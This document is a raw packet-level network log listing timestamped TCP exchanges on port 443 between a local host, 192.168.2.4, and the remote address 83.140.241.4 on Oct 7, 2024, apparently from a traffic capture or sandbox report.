Oct 7, 2024 21:30:04.010025978 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.011019945 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.011066914 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.011073112 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.011110067 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.011125088 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.011147976 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.014240026 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.028178930 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.028228998 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.028264999 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.028290987 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.028307915 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.029405117 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.029444933 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.029453993 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.029483080 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.029489994 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.029510021 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.029613018 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.030975103 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.031028032 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.031064034 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.031075954 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.031096935 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.038934946 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.066418886 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.066488981 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.066642046 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.066642046 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.066673994 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.067411900 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.090778112 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.090817928 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.090894938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.090894938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.090919971 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.091514111 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.092365980 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.092413902 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.092451096 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.092456102 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.092478037 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.094054937 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.094110012 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.094145060 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.094150066 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.094172001 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.094501019 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.095170975 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.095213890 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.095248938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.095259905 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.095280886 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.099317074 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.113046885 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.113099098 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.113197088 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.113197088 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.132535934 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.132548094 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.132560968 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.132646084 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.152400970 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.152466059 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.152484894 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.152498007 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.152523994 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.177315950 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.177386045 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.177403927 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.177418947 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.177437067 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.177580118 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.177622080 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.177629948 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.177654028 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.177670002 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.179917097 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.179965973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.179980993 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.179986954 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.180010080 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.180941105 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.180983067 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.181006908 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.181011915 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.181035042 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.197709084 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.197788000 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.197813988 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.197834015 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.197849989 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.199311018 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.199368954 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.199388027 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.199413061 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.199419975 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.199425936 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.200449944 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.200498104 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.200503111 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.200525999 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.200550079 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.236669064 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.236726999 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.236772060 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.236792088 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.236809015 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.260057926 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.260128021 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.260148048 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.260171890 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.260190010 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.260206938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.261487007 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.261532068 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.261543989 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.261568069 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.261648893 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.263322115 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.263372898 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.263412952 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.263427973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.263451099 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.265021086 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.265067101 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.265100956 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.265109062 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.265131950 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.281019926 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.281074047 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.281092882 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.281128883 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.491485119 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.510471106 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.510540962 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.510580063 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.510601997 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.510646105 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.510663986 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.510703087 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.510749102 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542392015 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542422056 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542443037 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542457104 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542469978 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542522907 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542547941 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542567968 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542596102 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542613029 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542624950 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542634964 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542654037 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542654037 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542663097 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542690039 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542689085 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542710066 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542718887 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542723894 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542733908 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542757034 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542762995 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542795897 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542805910 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542819977 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.542850018 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542850971 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.542880058 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.747425079 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.747497082 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.752268076 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.752285957 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.752304077 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.752341986 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.752352953 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.752367020 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.752382040 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.752387047 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.752408981 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.752438068 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774550915 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774580956 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774597883 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774607897 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774683952 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774694920 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774720907 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774732113 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774802923 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774811029 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774847984 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774863958 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774883986 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774888992 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774904966 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774909973 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774924994 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774934053 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774954081 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.774965048 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.774991989 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.775017977 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.919756889 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.919790983 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.919842958 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.919881105 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941126108 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941184044 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941235065 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941251040 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941279888 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941287994 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941299915 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941333055 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941342115 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941363096 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941375971 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941382885 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941404104 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941436052 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941443920 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941478014 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941487074 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941504002 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941519976 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:04.941557884 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:04.941592932 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.083811045 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.083853006 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.084054947 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.114969015 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.114974022 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.114986897 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115005970 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115020990 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115227938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.115227938 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.115267992 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115307093 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115319967 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115415096 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.115426064 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115447998 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.115555048 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.327399015 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.327596903 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.438004971 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.438047886 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.438069105 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.438133001 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.438184977 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.465965033 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.465974092 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.465986013 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466001987 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466025114 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466031075 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466036081 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466119051 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466129065 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466142893 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466155052 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466248989 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466255903 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466274977 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466284990 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466355085 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466372013 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.466382980 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.466439009 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.634366035 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
Oct 7, 2024 21:30:05.634392977 CEST | 443 | 49730 | 83.140.241.4 | 192.168.2.4 |
Oct 7, 2024 21:30:05.634476900 CEST | 49730 | 443 | 192.168.2.4 | 83.140.241.4 |
